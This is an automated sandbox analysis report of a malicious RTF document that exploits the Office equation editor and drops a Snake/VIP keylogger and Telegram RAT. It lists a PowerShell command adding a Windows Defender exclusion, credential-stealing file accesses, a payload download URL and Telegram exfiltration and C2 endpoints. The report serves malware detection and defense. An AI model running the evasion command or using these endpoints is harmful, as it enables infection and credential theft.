                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeMemory allocated: 1B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeMemory allocated: 2170000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeMemory allocated: 940000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeMemory allocated: 5F10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeMemory allocated: 6F10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeMemory allocated: 7070000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeMemory allocated: 8070000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeMemory allocated: 87D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeMemory allocated: 97D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeMemory allocated: A7D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeMemory allocated: 1C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeMemory allocated: 2300000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeMemory allocated: 450000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1966Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4808Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeWindow / User API: threadDelayed 9543Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3328Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe TID: 3492Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3704Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3708Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3632Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe TID: 3716Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe TID: 3748Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe TID: 3748Thread sleep time: -9600000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe TID: 3752Thread sleep count: 9543 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe TID: 3752Thread sleep count: 276 > 30Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3820Thread sleep time: -180000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_001D9A4C LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,8_2_001D9A4C
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  .NET source code references suspicious native API functions
                  Source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.raw.unpack, COVID19.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                  Source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe"
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe"Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeMemory written: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess created: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeQueries volume information: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeQueries volume information: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe VolumeInformationJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000008.00000002.908507517.0000000002301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 8.2.cmnjgyugo61000.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.908152550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.414699470.00000000039A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: cmnjgyugo61000.exe PID: 3472, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: cmnjgyugo61000.exe PID: 3576, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 8.2.cmnjgyugo61000.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.908152550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.414699470.00000000039A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: cmnjgyugo61000.exe PID: 3472, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: cmnjgyugo61000.exe PID: 3576, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: Yara matchFile source: 8.2.cmnjgyugo61000.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.908152550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.414699470.00000000039A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: cmnjgyugo61000.exe PID: 3472, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: cmnjgyugo61000.exe PID: 3576, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000008.00000002.908507517.0000000002301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 8.2.cmnjgyugo61000.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.908152550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.414699470.00000000039A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: cmnjgyugo61000.exe PID: 3472, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: cmnjgyugo61000.exe PID: 3576, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 8.2.cmnjgyugo61000.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.908152550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.414699470.00000000039A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: cmnjgyugo61000.exe PID: 3472, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: cmnjgyugo61000.exe PID: 3576, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  File and Directory Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts33
                  Exploitation for Client Execution                  		Boot or Logon Initialization Scripts111
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		1
                  Input Capture                  		13
                  System Information Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		14
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Command and Scripting Interpreter                  		Logon Script (Windows)Logon Script (Windows)3
                  Obfuscated Files or Information                  		Security Account Manager1
                  Process Discovery                  		SMB/Windows Admin Shares1
                  Screen Capture                  		11
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Install Root Certificate                  		NTDS31
                  Virtualization/Sandbox Evasion                  		Distributed Component Object Model1
                  Email Collection                  		3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                  Software Packing                  		LSA Secrets1
                  Application Window Discovery                  		SSH1
                  Input Capture                  		24
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials1
                  Remote System Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Masquerading                  		DCSync1
                  System Network Configuration Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Modify Registry                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
                  Virtualization/Sandbox Evasion                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron111
                  Process Injection                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1545179 Sample: na.doc Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 41 Initial sample is an obfuscated RTF file 2->41 43 Suricata IDS alerts for network traffic 2->43 45 Found malware configuration 2->45 47 23 other signatures 2->47 8 WINWORD.EXE 291 18 2->8         started        process3 file4 27 C:\Users\user\Desktop\~$na.doc, data 8->27 dropped 11 EQNEDT32.EXE 11 8->11         started        16 EQNEDT32.EXE 8->16         started        process5 dnsIp6 39 87.120.84.38, 49165, 80 SHARCOM-ASBG Bulgaria 11->39 29 C:\Users\user\AppData\...\cmnjgyugo61000.exe, PE32 11->29 dropped 31 C:\Users\user\...\CLLPdgxhnmwGf5Y[1].exe, PE32 11->31 dropped 65 Office equation editor establishes network connection 11->65 67 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->67 18 cmnjgyugo61000.exe 3 11->18         started        file7 signatures8 process9 signatures10 49 Machine Learning detection for dropped file 18->49 51 Adds a directory exclusion to Windows Defender 18->51 53 Injects a PE file into a foreign processes 18->53 21 cmnjgyugo61000.exe 12 2 18->21         started        25 powershell.exe 4 18->25         started        process11 dnsIp12 33 reallyfreegeoip.org 21->33 35 api.telegram.org 21->35 37 8 other IPs or domains 21->37 55 Installs new ROOT certificates 21->55 57 Tries to steal Mail credentials (via file / registry access) 21->57 59 Tries to harvest and steal browser information (history, passwords, etc) 21->59 signatures13 61 Tries to detect the country of the analysis system (by using the IP) 33->61 63 Uses the Telegram API (likely for C&C communication) 35->63

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  na.doc45%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
                  na.doc100%AviraHEUR/Rtf.Malformed

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\CLLPdgxhnmwGf5Y[1].exe100%Joe Sandbox ML

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                  https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                  http://ocsp.entrust.net030%URL Reputationsafe
                  http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                  http://checkip.dyndns.org/0%URL Reputationsafe
                  http://checkip.dyndns.org/q0%URL Reputationsafe
                  http://reallyfreegeoip.org0%URL Reputationsafe
                  http://checkip.dyndns.com0%URL Reputationsafe
                  http://ocsp.entrust.net0D0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                  http://crl.entrust.net/server1.crl00%URL Reputationsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                  http://checkip.dyndns.org0%URL Reputationsafe
                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                  https://reallyfreegeoip.org0%URL Reputationsafe
                  https://secure.comodo.com/CPS00%URL Reputationsafe
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                  http://crl.entrust.net/2048ca.crl00%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  		188.114.96.3
                  		truetrue
                    		unknown
                    api.telegram.org
                    		149.154.167.220
                    		truetrue
                      		unknown
                      checkip.dyndns.com
                      		158.101.44.242
                      		truefalse
                        		unknown
                        checkip.dyndns.org
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/173.254.250.78false
                            		unknown
                            http://checkip.dyndns.org/false
                            • URL Reputation: safe
                            		unknown
                            http://87.120.84.38/txt/CLLPdgxhnmwGf5Y.exetrue
                              		unknown
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2010/30/2024%20/%207:45:32%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/chrome_newtabcmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002594000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.000000000337B000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002581000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.00000000033C7000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://duckduckgo.com/ac/?q=cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002594000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.000000000337B000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002581000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.00000000033C7000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmfcmnjgyugo61000.exe, 00000008.00000002.909020505.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.00000000034D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://api.telegram.orgcmnjgyugo61000.exe, 00000008.00000002.908507517.00000000024B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://api.telegram.org/botcmnjgyugo61000.exe, 00000005.00000002.414699470.00000000039A7000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908152550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000024B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://ocsp.entrust.net03cmnjgyugo61000.exe, 00000008.00000002.908330033.000000000089B000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20acmnjgyugo61000.exe, 00000008.00000002.908507517.00000000024B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0cmnjgyugo61000.exe, 00000008.00000002.908330033.000000000089B000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://www.diginotar.nl/cps/pkioverheid0cmnjgyugo61000.exe, 00000008.00000002.908330033.000000000089B000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://varders.kozow.com:8081cmnjgyugo61000.exe, 00000005.00000002.414699470.00000000039A7000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908152550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002301000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://www.google.com/search?q=wmfcmnjgyugo61000.exe, 00000008.00000002.909020505.00000000034D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://checkip.dyndns.org/qcmnjgyugo61000.exe, 00000005.00000002.414699470.00000000039A7000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908152550.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
